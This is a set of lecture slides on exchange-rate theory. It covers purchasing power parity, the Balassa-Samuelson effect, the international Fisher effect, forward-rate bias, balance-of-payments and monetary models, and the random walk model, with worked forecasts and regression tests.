Q: Realistic? On average, transportation costs add 7% to the price of U.S. imports of meat and 16% to the import price of vegetables. Many products are heavily protected, even in the U.S. For example, peanut imports are subject to a tariff as high as 163.8%. Also, in the U.S., tobacco usage and excise taxes add USD 5.85 per pack.
• Absolute PPP: Qualifications
Some everyday goods protected in the U.S.:
- European Roquefort Cheese, cured ham, mineral water (100%)
- Paper Clips (as high as 126.94%)
- Canned Tuna (as high as 35%)
- Synthetic fabrics (32%)
- Sneakers (48% on certain sneakers)
- Japanese leather (40%)
- Peanuts (shelled 131.8%, and unshelled 163.8%).
- Brooms (quotas and/or tariff of up to 32%)
- Chinese tires (35%)
- Trucks (25%) & cars (2.5%)
Some Japanese protected goods:
- Rice (778%)
- Beef (38.5%, but can jump to 50% depending on volume).
- Sugar (328%)
- Powdered Milk (218%)
• Absolute PPP: Qualifications
(3) PPP is unlikely to hold if Pf and Pd represent different baskets. This is why the Big Mac is a popular choice.
(4) Trade takes time (contracts, information problems, etc.)
(5) Internationally non-traded (NT) goods –i.e. haircuts, home and car repairs, hotels, restaurants, medical services, real estate. The NT good sector is big: 50%-60% of GDP (big weight in CPI basket).
Then, in countries where NT goods are relatively high, the CPI basket will also be relatively expensive. Thus, PPP will find these countries' currencies overvalued relative to currencies in low NT cost countries.
Note: In the short-run, we will not take our cars to Mexico to be repaired, but in the long-run, resources (capital, labor) will move. We can think of the over-/under-valuation as an indicator of movement of resources.
• Absolute PPP: Qualifications
The NT sector also has an effect on the price of traded goods. For example, rent and utilities costs affect the price of a Big Mac. (25% of Big Mac due to NT goods.)
• Empirical Fact
Price levels in richer countries are consistently higher than in poorer ones. This fact is called the Penn effect. Many explanations, the most popular: The Balassa-Samuelson (BS) effect.
• Balassa-Samuelson effect.
Labor costs affect all prices. We expect average prices to be cheaper in poor countries than in rich ones because labor costs are lower.
This is the so-called Balassa-Samuelson effect: Rich countries have higher productivity and, thus, higher wages in the traded-goods sector than poor countries do. But, firms compete for workers. Then wages in NT goods and services are also higher =>Overall prices are lower in poor countries.
• For example, in 2000, a typical McDonald’s worker in the U.S. made USD 6.50/hour, while in China made USD 0.42/hour.
• The Balassa-Samuelson effect implies a positive correlation between PPP exchange rates (overvaluation) and high productivity countries.
• Incorporating the Balassa-Samuelson effect into PPP:
1) Estimate a regression: Big Mac Prices against GDP per capita.
• Incorporating the Balassa-Samuelson effect into PPP:
2) Compute fitted Big Mac Prices (GDP-adjusted Big Mac Prices), along the regression line. Use the difference between GDP-adjusted Big Mac Prices and actual prices to estimate PPP over/under-valuation.
The rate of change in the prices of products should be similar when measured in a common currency. (As long as trade frictions are unchanged.)
(Relative PPP)
where,
If = foreign inflation rate from t to t+T;
Id = domestic inflation rate from t to t+T.
Linear approximation: sTPPP Id - If --one-to-one relation
Example: Prices double in Mexico relative to those in Switzerland. Then, SMXN/CHF,t doubles (say, from 9 MXN/CHF to 18 MXN/CHF). ¶
It’s 2011. You have the following information:
CPIUS,2011 = 104.5,
CPISA,2011 = 100.0,
S2011 =.2035 USD/ZAR.
You are given the 2012 CPI’s forecast for the U.S. and SA:
E[CPIUS,2012] = 110.8
E[CPISA,2012] = 102.5.
You want to forecast S2012 using the relative (linearized) version of PPP.
E[IUS-2012] = (110.8/104.5) - 1 = .06029
E[ISA-2012] = (102.5/100) - 1 = .025
E[S2012] = S2011 x (1 + E[IUS]- E[ISA])
= .2035 USD/ZAR x (1 + .06029 - .025) = .2107 USD/ZAR.
Under the linear approximation, we have PPP Line
Id - If
PPP Line
B (FC appreciates)
A
(FC depreciates)
45º
sT (DC/FC)
Look at point A: sT > Id - If,
=> Priced in FC, the domestic basket is cheaper
=> pseudo-arbitrage against foreign basket => FC depreciates
(1) Under relative PPP, Rt remains constant.
(2) Relative PPP does not imply that St is easy to forecast.
(3) Without relative price changes, an MNC faces no real operating FX risk (as long as the firm avoids fixed contracts denominated in FC.
Under Relative PPP:sT Id – If
1. Visual Evidence
Plot (IJPY-IUSD) against st(JPY/USD), using monthly data 1970-2010.
Check to see if there is a No 45° line.
More formal tests: Regression
st = (St+T - St)/St = α + β (Id - If ) t + εt, -ε: regression error, E[εt]=0.
The null hypothesis is: H0 (Relative PPP true): α=0 and β=1
H1 (Relative PPP not true): α≠0 and/or β≠1
(1) t-test = [Estimated coeff. – Value of coeff. under H0]/S.E.(coeff.) t-test~ tv (v=N-K=degrees of freedom)
(2) F-test = {[RSS(H0)-RSS(H1)]/J}/{RSS(H1)/(N-K)}
F-test ~ FJ,N-K (J= # of restrictions in H0, K= # parameters in model, N= # of observations, RSS= Residuals Sum of Squared).
st (JPY/USD) = (St - St-1)/St-1 = α + β (IJAP – IUS) t + εt.
R2 = 0.00525
Standard Error (σ) = .0326
F-stat (slopes=0 –i.e., β=0) = 2.305399 (p-value=0.130)
Observations = 439
Coefficient Stand Err t-Stat P-value
Intercept (α) 0.00246 0.001587 -1.55214 0.121352
(IJAP – IUS) (β)-0.36421 0.239873 -1.51835 0.129648
We will test the H0 (Relative PPP true): α=0 and β=1
Two tests: (1) t-tests (individual tests)
(2) F-test (joint test)
st (JPY/USD) = (St - St-1)/St-1 = α + β (IJAP – IUS) t + εt.
R2 = 0.00525
Standard Error (σ) = .0326
F-stat (slopes=0 –i.e., β=0) = 2.305399 (p-value=0.130)
F-test (H0: α=0 and β=1): 16.289 (p-value: lower than 0.0001) => reject at 5% level (F2,467,.05= 3.015)
Observations = 439
Coefficient Stand Err t-Stat P-value
Intercept (α) -0.00246 0.001587 -1.55214 0.121352
(IJAP – IUS) (β) -0.36421 0.239873 -1.51835 0.129648
Test H0, using t-tests (t437.05=1.96 –Note: when N-K>30, t.05 = 1.96):
tα=0: (-0.00246–0)/0.001587= -1.55214 (p-value=.12) => cannot reject
tβ=1: (-0.36421-1)/0.239873= -5.6872 (p-value:.00001) => reject. ¶
- Short- run: PPP is a poor model to explain short-term St movements.
- Long-run: Evidence of mean reversion for Rt.
Currencies that consistently have high inflation rate differentials –i.e., (Id-If) positive-- tend to depreciate.
• Let’s look at the MXN/USD case.
We want to calculate StPPP= Pd,t / Pf,t over time.
(1) Divide StPPP by SoPPP (t=0 is our starting point).
(2) After some algebra,
StPPP = SoPPP x [Pd,t / Pd,o] x [Pf,o/Pf,t]
By assuming SoPPP = So, we plot StPPP over time.
(Note: SoPPP = So assumes that at t=0, the economy was in equilibrium. This may not be true: Be careful when selecting a base year.)
- In the short-run, StPPP is missing the target, St.
- But, in the long-run, StPPP gets the trend right. (As predicted by PPP, the high Mexican inflation rates differentials against the U.S., depreciate the MXN against the USD.)
As predicted by PPP, since the inflation rates in the U.S. have been consistently higher than in Japan, in the long-run, the USD depreciates against the JPY.
- Equilibrium (“correct”) exchange rates. A CB can use StPPP to determine intervention bands.
- Explanation of St movements(“currencies with high inflation rate differentials tend to depreciate”).
- Indicator of competitiveness or under/over-valuation: Rt > 1 => FC is overvalued (& Foreign prices are not competitive).
- International GDP comparisons: Instead of using St, StPPP is used. For example, per capita GDP (in 2012):
Using market prices (St, actual exchange rates):
U.S. GDP: USD 15.06 trillion, a 23.1% of the world’s GDP (27.5% in ’96).
China’s GDP: USD 6.99 trillion, a 9.3% of the world’s GDP (3.1% in ’96).
Under PPP exchange rates –i.e., StPPP:
U.S. GDP: USD 15.06 trillion (the same) for a 20.0% share.
China’s GDP: USD 11.3 trillion, for a 14.4% share.
rd (f) = (1 + if x T/360) (1 + sT) -1.
rd (d) = id x T/360.
sIFET = (1 + id x T/360) - 1. (This is the IFE)
(1 + if x T/360)
Example: Forecasting St using IFE.
It’s 2011:I. You have the following information:
S2011:I=1.0659 USD/EUR.
iUSD,2011:I=6.5%
iEUR,2011:I=5.0%.
T = 1 quarter = 90 days.
eIFEf,,2011:II = [1+ iUSD,2011:I x (T/360)]/[1+ iEUR,2011:I x (T/360)] - 1 =
= [1+.065*(90/360))/[1+.05*(90/360)] – 1 = 0.003704
E[S2011:II] = S2011:I x (1+eIFEf,,2011:II ) = 1.659 USD/EUR *(1 + .003704)
= 1.06985 USD/EUR
That is, next quarter, you expect St to change 1.06985 USD/EUR to compensate for the higher US interest rates. ¶
exchange rate. Equilibrium will be reached when
there is no capital flows from one country to another
to take advantage of interest rate differentials.
IFE: Implications
If IFE holds, the expected cost of borrowing funds is identical across currencies. Also, the expected return of lending is identical across currencies.
Carry trades –i.e., borrowing a low interest currency to invest in a high interest currency- should not be profitable.
If departures from IFE are consistent, investors can profit from them.
Annual interest rate differential (iMEX - iUSD) were between 7% and 16%.
The E[st]= -5% > sIFEt => Pseudo-arbitrage is possible (The MXN at t+T is overvalued!)
Carry Trade Strategy:
1) Borrow USD funds (at iUSD)
2) Convert to MXN at St
3) Invest in Mexican funds (at iMEX)
4)Wait until T. Then, convert back to USD at St+T.
Expected foreign exchange loss 5% (E[st ]= -5%)
Assume (iUSD – iMXN) = -7%. (Say, iUSD= 5%, iMXN=12%.)
E[st ]= -5% > sIFEt=-7% => “on average” strategy (1)-(4) should work.
Expected return (MXN investment):
rd (f) = (1 + iMXNxT/360)(1 + sT) -1 = (1.12)*(1-.05) - 1 = 0.064
Payment for USD borrowing:
rd (d) = id x T/360 = .05
Expected Profit = .014 per year
Note: Fidelity used this uncovered strategy during the early 90s. In Dec. 94, after the Tequila devaluation of the MXN against the USD, lost everything it gained before. Not surprised, after all the strategy is a “pseudo-arbitrage” strategy! ¶
Based on linearized IFE: sT (id - if) x T/360
Expect a 45 degree line in a plot of sT against (id-if)
Example: Plot for the monthly USD/EUR exchange rate (1999-2007)
No 45° line => Visual evidence rejects IFE. ¶
st = (St+T - St)/St = α + β (id - if )t + εt, (εt error term, E[εt]=0).
H0 (IFE not true): α≠0 and/or β≠1
Example: Testing IFE for the USD/EUR with monthly data (99-07).
R2 = 0.057219
Standard Error = 0.016466
F-statistic (slopes=0) = 6.311954 (p-value=0.0135)
F-test (α=0 and β=1) = 76.94379 (p-value= lower than 0.0001)
=> rejects H0 at the 5% level (F2,104,.05=3.09)
Observations = 106
tα=0 (t-test for α = 0): (0.00293 – 0)/0.001722 = 1.721
=> cannot reject at the 5% level.
tβ=1 (t-test for β = 1): (-0.26342-1)/0.10485 = -12.049785
=> reject at the 5% level.
Formally, IFE is rejected in the short-run (both the joint test and the t-test reject H0). Also, note that β is negative, not positive as IFE expects. ¶
• IFE: Evidence
Similar to PPP, no short-run evidence. Some long-run support:
=> Currencies with high interest rate differential tend to depreciate.
(For example, the Mexican peso finally depreciated in Dec. 1994.)
• According to the Expectations hypothesis (EH) of exchange rates:
Et[St+T] = Ft,T.
That is, on average, the future spot rate is equal to the forward rate.
Since expectations are involved, many times the equality will not hold. It will only hold on average.
Data: Ft,180 = 5.17 ZAR/USD.
An investor expects: E[St+180]=5.34 ZAR/USD. (A potential profit!)
Strategy for the non-EH investor:
1. Buy USD forward at ZAR 5.17
2. In 180 days, sell the USD for ZAR 5.34.
Now, suppose everybody expects St+180 = 5.34 ZAR/USD
=> Disequilibrium: everybody buys USD forward (nobody sells USD forward). And in 180 days, everybody will be selling USD. Prices should adjust until EH holds.
Since an expectation is involved, sometimes you’ll have a loss, but, on average, you’ll make a profit. ¶
Under EH, Et[St+T] = Ft,T → Et[St+T - Ft,T] = 0
Empirical tests of the EH are based on a regression:
(St+T - Ft,T)/St = α + β Zt + εt, (where E[εt]=0)
where Zt represents any economic variable that might have power to explain St, for example, (id-if).
The EH null hypothesis: H0: α=0 and β=0. (Recall (St+T - Ft) should be unpredictable!)
Usual result: β < 0 (and significant) when Zt= (id-if).
But, the R2 is very low.
(St+T - St)/St = st = α + β (id - if) + εt.
The null hypothesis is H0: α=0 and β=1.
Usual Result: β < 0. when (id-if)=2%, the exchange rate depreciates by (β x .02) (instead of appreciating by 2% as predicted by UIPT!)
Summary: Forward rates have little power for forecasting spot rates
Puzzle (the forward bias puzzle)!
Explanations of forward bias puzzle:
- Risk premium? (holding a risky asset requires compensation)
- Errors in calculating Et[St+T]? (It takes time to learn the game)
- Peso problem? (small sample problem)
The risk premium of a given security is defined as the return on this security, over and above the risk-free return.
A: Only if exchange rate risk is not diversifiable.
After some simple algebra, we find that the expected excess return on the FX market is given by:
(Et[St+T] - Ft,T)/St = Pt,t+T.
A risk premium, P, in FX markets implies
Et[St+T] = Ft,T + St Pt,t+T.
If Pt,t+T is consistently different from zero, markets will display a forward bias.
Data: St = 1.58 USD/GBP
Et[St+6-mo] = 1.60 USD/GBP
Ft,6-mo= 1.62 USD/GBP.
The GBP is expected to appreciate against the USD by 1.27%
The forward premium suggests a GBP appreciation of 2.53%.
The GBP is expected to appreciate against the USD by 1.27%
The forward premium suggests a GBP appreciation of 2.53%.
(1) BOP approach treats exchange rates as determined in flow markets.
(2) Monetarist approach treats exchange rates as any other asset price.
• Balance Of Payments (BOP)
BOP divides the flow of foreign currency to the domestic country into:
Current account (CA): measures the movement of good and services + unilateral transfers.
Capital Account (KA): measures financial transactions associated with trade + changes in the composition of international portfolios.
Official Account (OR): measures changes in official reserves.
BOP = CA + KA + OR.
• As long as the country is not bankrupt, BOP = 0.
In general OR is small, CA -KA.
•The Balance of Trade as a determinant of exchange rates
• BOP: Supply and demand for a currency arise from the flows related to the BOP: trade, portfolio investment, and direct investment.
BOP approach views exchange rates as determined in flow markets.
• The Balance of Trade theory simplifies the BOP approach: It postulates a relation between CA and Rt (Real exchange rate = StPf/Pd):
CA = X - M = f(Rt, Yd,Yf).
In general, exchange rates move to compensate a trade imbalance:
Rt (St) X and M (CA)
Rt (St) X and M (CA)
• The Macroeconomics of the BOP: Absorption Approach
In equilibrium, we can write:
CA = S - [I + (G - T)],
where
S: after-tax private savings.
I: private investment.
G: government spending.
T: national taxes.
To reduce a CA deficit, one of the following must happen in equilibrium:
I. S , for a given level of I and (G-T).
ii. I , for a given level of S and (G-T).
iii. G-T , for a given level of S and I.
Example: Japan has a (relative) high savings rate. Many argue that this is the reason behind the persistent Japanese CA surpluses. ¶
•
• The Monetary Approach to the BOP
Consider the capital account (KA):
when the OR is small, KA provides the other side of the CA.
KA is assumed to depend on the interest rate differential and St:
KA = f(id-if, St).
• Look at the KA:
When KA > 0 (CA<0) the country is either accumulating debt or selling its current stock of foreign assets.
When KA < 0 (CA>0) the country is either reducing debt or increasing its current stock of foreign assets.
Example: Japan may run a CA>0 without changes in the real JPY, as long as the Japanese continue to accumulate foreign assets. ¶
• BOP Approach: Implications
First, we ignored financial flows when we analyzed the BOP. We said:
A CA deficit (surplus) tends to be corrected with a depreciation (appreciation) of St.
But once we consider the capital account, this depreciation (appreciation) might not occur. Foreigners might be finance the CA imbalance.
Now, the exchange rate depreciation (appreciation) might not occur.
Example: Japan may have CA>0 without any change in the real JPY because the Japanese continue to accumulate foreign assets. ¶
In the long-run the BOP approach has more precise predictions:
countries will not be able to finance CA imbalances forever.
continuous CA deficits in the long-run will create KA outflows and depreciation pressures.
Exchange rates are asset prices traded in efficient markets.
Like other asset prices, exchange rates are determined by expectations.
Current trade flows are irrelevant (flow markets are not important).
• Asset approach models assume a high degree of capital mobility between assets denominated in different currencies.
We need to specify the assets an investor considers.
For example, a simple monetary model considers domestic and foreign money. Only news related to these assets will move exchange rates.
• A Simple Monetary Approach Model
Assets: domestic money and foreign money.
We start from the equilibrium QTM relation:
Mj Vj = Pj Yj j = domestic country, foreign country.
To get St, we use Absolute PPP, where St is a ratio of prices (= Pd/Pf):
St = (Vd/Vf) x (Yf/Yd) x (MSd/MSf),
Vj: velocity of money of country j,
Yj: real output of country j,
MS,j: supply for money of country j (in equilibrium, MS=LD).
Recall that xt,T = (Xt+T - Xt)/Xt ≈ log(Xt+T) – log(Xt) (=> a growth rate).
AssumingV is constant, we express the model in changes:
=> st,T = yf,T - yd,T + mSd,T - mSf,T.
• A Simple Monetary Approach Model
The simple Monetary Model produces the following model for st,T :
=> st,T = yf,T - yd,T + mSd,T - mSf,T.
• Monetary Approach: Implications
- A stable monetary policy –i.e., low mSd– tends to appreciate the DC.
- Economic growth –i.e., yd,T>0 – tends to appreciate the DC.
But, keep in mind that all variables are in relative terms.
Note: St behaves like any other speculative asset price: St changes whenever relevant information –in this case, money growth and GDP growth –is released.
• Monetary Approach: Application
Example: Forecasting St with the simple monetarist model.
The money supply in the U.S. market increases by 2% and all the other variables remain unchanged.
yf,T = yd,T = mSf,T = 0.
mSd,T = .02 st,T = .02.
MSd incresaes 2% St increases 2% (depreciation of the USD).
Now, if investors expect the U.S. Fed to quickly increase U.S. interest rates to avoid inflationary pressures, then the USD may appreciate instead of depreciate. ¶
• Monetary Approach: Sticky Prices
There are many variations of the monetary model.
• One popular variation takes into account that PPP is not a good short-run theory and proposes sticky prices (in the short-run).
The sticky prices monetary model incorporates the fact that exchange rates are a lot more volatile than prices of goods and services.
• Since prices do not react instantaneously to “shocks” –say, a monetary shock –, financial prices do. In this case, the exchange rate overreacts (depreciates more than it should in non-sticky prices world) to bring prices and quantities immediately to equilibrium.
In the long-run, prices will adjust and the exchange rate will appreciate accordingly. This is called overshooting.
This is a popular model to explain the behavior of St after financial crisis.
• Monetary Approach: Sticky Prices
• There is a shock in the economy (a monetary shock).
• Prices do not react instantaneously. We move from A to B. Inflation stays at Id,0, but the exchange rate overreacts (depreciates more than it should in non-sticky prices world) to bring prices and quantities immediately to equilibrium.
• In the long-run, prices will adjust (with higher inflation (Id,1) and the exchange rate will appreciate, moving to s1.
Id
C
Id,1
A
B
B
B
Id,0
s0
s2
st
s1
• Structural Models: Evidence
• Standard tests of structural models are based on a regression:
st = α + β Zt + εt
where Zt represents a structural explanatory variable: money growth, income growth rates, (id-if), etc.
Usual results:
- The null hypothesis: H0: β=0, is difficult to reject.
- The R2 tends to be small.
• Many economists suggest that structural models are misspecified, because of the so-called structural change problem: the parameters change with changes in economic policy !
For example, a new Chairman of the Fed may have an effect on the coefficient β. Then, St may become more sensitive to (id-if).
• Structural Models: Evidence
• But, studies analyzing the movement of St around news announcements have found some support for structural model .
• These event studies find that news about:
- Greater than expected U.S. CA deficits tends to depreciate the USD, as predicted by the BOP approach.
- Unexpected U.S. economic growth tends to appreciate the USD, as predicted by the monetary approach.
- Positive MS surprises tends to appreciate the USD. (Consistent with the monetary approach if agents expect the US Fed to quickly change interest rates to offset the increase in money supply.)
- Unexpected increases (decreases) of interest rate differentials tends to depreciate (appreciate) the domestic currency, as predicted by the monetary approach.
• Regression-based structural models do poorly. But, the variables used in structural models tend to have power to explain changes in St.
• Parity Conditions
- PPP => Rejected in the short-run, some long-run support.
- IFE => Rejected in the short-run, some long-run support.
- EH => Rejected in the short-run. Puzzle!
• Structural models
- BOP & Monetary Approach
=> Rejected in the short-run, some support through event studies.
• Q: Why is st so (statistically) difficult to explain?
The Martingale-Random Walk Model
A random walk is a time series independent of its own history. Your last step has no influence in your next step. The past does not help to explain the future.
Motivation: Drunk walking in a park. (Problem posted in Nature. Solved by Karl Pearson. July 1905 issue.)
Intuitive notion: The FX market is a "fair game.“ (Unpredictable!)
• Martingale-Random Walk Model: Implications
The Random Walk Model (RWM) implies:
Et[St+T] = St.
Powerful theory: at time t, all the info about St+T is summarized by St.
Theoretical Justification: Efficient Markets (all available info is incorporated into today’s St.)
Example: Forecasting with RWM
St = 1.60 USD/GBP
Et[St+7-day] = 1.60 USD/GBP
Et[St+180-day] = 1.60 USD/GBP
Et[St+10-year] = 1.60 USD/GBP. ¶
Note: If St follows a random walk, a firm should not spend any resources to forecast St+T.
• Martingale-Random Walk Model: Evidence
Meese and Rogoff (1983, Journal of International Economics) tested the short-term forecasting performance of different models for the four most traded exchange rates. They considered economic models (PPP, IFE, Monetary Approach, etc.) and the RWM.
The metric used in the comparison: forecasting error (squared).
The RWM performed as well as any other model.
Cheung, Chinn and Pascual (2005) checked the Meese and Rogoff’s results with 20 more years of data. RWM still the best model. | https://www.slideserve.com/mort/parity-conditions | CC-MAIN-2018-43 | refinedweb | 7,325 | 68.77 |
USACO Bronze 2015 February - Censoring
Authors: Brad Ma, Ahmad Bilal
ExplanationExplanation
Let us define as the final censored text.
We can iterate through every character of , appending it to . However, whenever we append a character we we need to check if ends with the censored word. If it does, we remove it from by taking off the last few characters.
As a demonstration, let's try this on the example case where:
Our solution will loop through each character of , appending it to until it becomes , when it will cut off the last 3 characters since they equal . This results in becoming .
Right after this, becomes as the next letter in is , so we omit the last 3 characters again and becomes .
After this, the check isn't triggered anymore, so we end up with as our final word.
ImplementationImplementation
Time Complexity:
Python
import syssys.stdin = open('censor.in', 'r')sys.stdout = open('censor.out', 'w')s = input().strip()t = input().strip()censored = ""# Add each character to the censored stringfor char in s:
C++
#include "bits/stdc++.h"using namespace std;Code Snippet: {USACO-style I/O. See General / Input & Output (Click to expand)int main() {setIO("censor");string s;string t;cin >> s >> t;
Java
import java.util.*;import java.io.*;public class Censor {public static void main (String[] args) throws IOException {Kattio io = new Kattio("censor");String s = io.next();String t = io.next();// We use StringBuilder in Java because it's significantly faster
Join the USACO Forum!
Stuck on a problem, or don't understand a module? Join the USACO Forum and get help from other competitive programmers! | https://usaco.guide/problems/usaco-526-censoring/solution | CC-MAIN-2022-40 | refinedweb | 271 | 58.18 |
0
I posted a program earlier today in response to another thread and noticed that I had forgotten to clean up/free the memory I used. Here's the program.
#include <iostream> using namespace std; int main() { int LIST_SIZE, NUM_CHARS_PER_ELEMENT; cout << "Enter number of elements in list: "; cin >> LIST_SIZE; cout << "Enter number of characters in each array element: "; cin >> NUM_CHARS_PER_ELEMENT; char **list = new char*[LIST_SIZE]; for (int i = 0; i < LIST_SIZE; i++) { list[i] = new char[NUM_CHARS_PER_ELEMENT]; } cout << "Enter " << LIST_SIZE << " names\n"; for (int i = 0; i < LIST_SIZE; i++) { cout << "Enter name " << i << " : "; cin >> list[i]; } cout << "Here are the names\n"; for (int i = 0; i < LIST_SIZE; i++) { cout << "Name " << i << " : " << list[i] << endl; } for (int i = 0; i < LIST_SIZE; i++) delete []list[i]; delete list; return 0; }
I left off lines 33 through 36 in my prior post. My question is this. Are lines 33 - 36 necessary? What happens if I leave them out? Our instructors drilled into our heads the need to free any memory we reserved with
new once we were done with it, but in this case, since this is done at the very end of the program, does it really matter? Isn't the memory released automatically when the program ends? | https://www.daniweb.com/programming/software-development/threads/204623/what-happens-if-i-don-t-free-the-memory-i-reserved-in-the-program | CC-MAIN-2017-47 | refinedweb | 207 | 63.53 |
Meet Pandas: loc, iloc, at & iat
April 27, 2020 | 4 min read | 115 views
Have you ever confused Pandas methods
loc,
iloc,
at, and
iat with each other? Pandas is a great library for handling tabular data, but its API is too diverse and somewhat unintuitive. Understanding its design concepts might help it to some extent 🐼
So, this post aims to help understand differences between Pandas
loc,
iloc,
at, and
iat methods. In short, the differences are summarized in the table below:
* If this table makes sense, you won’t need this post any more.
Let’s find the differences using a simple example!
Load Example Data
In this post, I use the iris dataset in the scikit-learn. The snippets in this post are supposed to be executed on Jupyter Notebook, Colaboratory, and stuff.
import pandas as pd from sklearn.datasets import load_iris iris = load_iris() df = pd.DataFrame(iris.data, columns=iris.feature_names) df
The dataframe should look something like this.
at & iat Access a Scalar Value
If you just want to access a scalar value in the dataframe, it is fastest to use
at and
iat methods. They both take two arguments to specify the row and the column to access, and produce the same outputs. The difference between them are discussed afterwards.
print(df.at[0, "sepal width (cm)"]) # 3.5 print(df.iat[0, 1]) # 3.5
loc & iloc Access Multiple Values
When you want to access a scalar value,
loc and
iloc methods are a bit slower but produce the same outputs as
at and
iat methods.
print(df.loc[0, "sepal width (cm)"]) # 3.5 print(df.iloc[0, 1]) # 3.5
However,
loc and
iloc methods can also access multiple values at a time. The following two statements give the same results: the values at the first row and the first two columns.
print(df.loc[0, :"sepal width (cm)"]) print(df.iloc[0, :2]) # sepal length (cm) 5.1 # sepal width (cm) 3.5 # Name: 0, dtype: float64
The sliced form of the second argument is invalid for
at and
iat methods.
print(df.at[0, :"sepal width (cm)"]) print(df.iat[0, :2]) # TypeError: unhashable type: 'slice'
You can input boolean arrays to specify rows and columns to access.
print(df.loc[0, [True, True, False, False]]) print(df.iloc[0, :2]) # sepal length (cm) 5.1 # sepal width (cm) 3.5 # Name: 0, dtype: float64
at & loc vs. iat & iloc
So, what exactly is the difference between
at and
iat, or
loc and
iloc? I first thought that it’s the type of the second argument. Not accurate.
at and
loc methods access the values based on its labels, while
iat and
iloc methods access the values based on its integer positions.
This difference is clear when you sort the dataframe.
df_sorted = df.sort_values("sepal width (cm)") df_sorted
Note that the indices are re-ordered according to the
sepal width (cm) column.
Now, the label-based
df_sorted.at[0, "sepal width (cm)"] finds the row labeled
0 but the position-based
df_sorted.iat[0, 1] finds the row at the top. The relationship between
loc and
iloc methods is the same. Therefore:
print(df_sorted.at[0, "sepal width (cm)"]) # 3.5 print(df_sorted.iat[0, 1]) # 2.0 print(df_sorted.loc[0, "sepal width (cm)"]) # 3.5 print(df_sorted.iloc[0, 1]) # 2.0
Conclusion
I hope this helps someone understand the differences between these confusing methods.
That’s it for today. Stay safe!
References
[1] Indexing and selecting data — pandas 1.0.3 documentation
[2] pandasで任意の位置の値を取得・変更するat, iat, loc, iloc | note.nkmk.me | https://hippocampus-garden.com/pandas_loc/ | CC-MAIN-2020-40 | refinedweb | 604 | 77.03 |
/* ** (c) COPYRIGHT MIT 1995. ** Please first read the full copyright statement in the file COPYRIGH. */
This is the module for accessing local files and directories. The module contans
#ifndef WWWFILE_H #define WWWFILE WWWFile interface provides a platform independent access scheme for local files. The local file access works exactly like any other access scheme, for example HTTP, in that the "file protocol" is independent of the underlying transport. This can be used to for example slide in a CVS transport layser underneath the file module without making any modifications to the file module itself. You can read more about the transport managament in the Transport Interface.
#include "HTFile.h"
When accessing the local file system, you can enable content negotiation
as described in the HTTP
specification. The content negotiation algorithm is based on file
suffixes as defined by the Bind manager. When looking
for a file you do not have to specify a suffix. Instead this module
looks for all alternatives with the same main name. For example, looking
for the file Overview can result in any of the files (or directories)
Overview.txt, Overview.html, Overview.ps etc. The selection
algorithm is based on the values of the preferences for language, media type,
encoding, etc. - exactly like a server would do with the
accept
headers.
#include "HTMulti.h"
This module sets up the binding between a file suffix and a media type, language, encoding etc. In a client application the suffixes are used in protocols that does not directly support media types etc., like FTP, and in server applications they are used to make the bindings between the server and the local file store that the server can serve to the rest of the world (well almost)
#include "HTBind.h"
Register the default set of bindings between file suffixes and media types. This is used for example to guess the media type of a FTP URL of a local file URL.
#include "HTBInit.h"
End of FILE module
#ifdef __cplusplus } /* end extern C definitions */ #endif #endif | http://www.w3.org/Library/src/WWWFile.html | CC-MAIN-2013-20 | refinedweb | 337 | 54.73 |
Help:Style/White space
This article defines the standards for the use of whitespace characters in the source code of articles. The style used in the examples is to be considered an integral part of the rules..
- There should be no blank lines separating the elements of the article's header (magic words, categories and interlanguage links), nor between the header and the first line of body text or markup.
- In the body of the article, separate special blocks (the related articles box, lists, code blocks, article status templates, notes, tips, warnings etc.) from normal text with an empty line.
Main, Category, ArchWiki, Help namespaces
Example
[[Category:Example A]] [[Category:Example B]] [[es:Article]] [[zh-hans === Single. -- ~~~~ | https://wiki.archlinux.org/title/Help:Style/White_space | CC-MAIN-2022-05 | refinedweb | 117 | 52.9 |
Using curl over ftp took 3+ minutes for a 4 byte file w/ EPSV
It took over 3 minutes to download a 4 byte file with curl via ftp. It took less than a second with wget.
$ time curl -o testfile.txt -u myusername:mypassword
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4 0 4 0 0 0 0 --:--:-- 0:03:09 --:--:-- 0 real 3m9.411s user 0m0.000s sys 0m0.050s
Running curl with the verbose option¶
Running curl with the verbose option showed it was failing in "Extended Passive Mode".
$ curl -v -o testfile.txt -u myusername:mypassword
* About to connect() to port 21 (#0) * Trying 10.1.2.102... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0connected * Connected to (10.1.2.102) port 21 (#0) < 220 Welcome! 01-srv. > USER myusername < 331 Please specify the password. > PASS mypassword < 230 Login successful. > PWD < 257 "/" * Entry path is '/' > CWD dmi < 250 Directory successfully changed. > EPSV * Connect data stream passively < 229 Entering Extended Passive Mode (|||58226|) 0 0 0 0 0 0 0 0 --:--:-- 0:03:09 --:--:-- 0Connection timed out * couldn't connect to host * got positive EPSV response, but can't connect. Disabling EPSV > PASV < 227 Entering Passive Mode (10,1,2,102,190,42) * Trying 10.1.2.102... connected * Connecting to 10.1.2.102 (10.1.2.102) port 48682 > TYPE I < 200 Switching to Binary mode. > SIZE testfile.txt < 213 4 > RETR testfile.txt < 150 Opening BINARY mode data connection for testfile.txt (4 bytes). * Maxdownload = -1 * Getting file with size: 4 { [data not shown] * Remembering we are in dir "path/to/" < 226 File send OK.
Disabling EPSV¶
I googled and found that some servers have a problem using Extended Passive Mode (EPSV). To disable Extended Passive Mode, use the
--disable-epsv option. With this option, the download took 0.046 seconds.
$ time curl --disable-epsv -o testfile.txt -u myusername:mypassword
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4 100 4 0 0 112 0 --:--:-- --:--:-- --:--:-- 133 real 0m0.046s user 0m0.010s sys 0m0.000s
Disabling EPSV with libcurl¶
Set
CURLOPT_FTP_USE_EPSV to 0. See.
Disabling EPSV with pycurl¶
import pycurl c = pycurl.Curl() c.setopt(c.FTP_USE_EPSV, 0) | https://www.saltycrane.com/blog/2011/10/using-curl-ftp-took-3-minutes-4-byte-file-epsv/ | CC-MAIN-2019-47 | refinedweb | 399 | 76.93 |
The Google+ Follow button is a simple widget that works well in site designs that that use other social follow buttons or when space is constrained.
Like the badges, your users can immediately add your page or profile to their circles without leaving your site.
Use of Google+ buttons are subject to the Google+ Platform Buttons Policy.
Adding the Google+ Follow button to your page
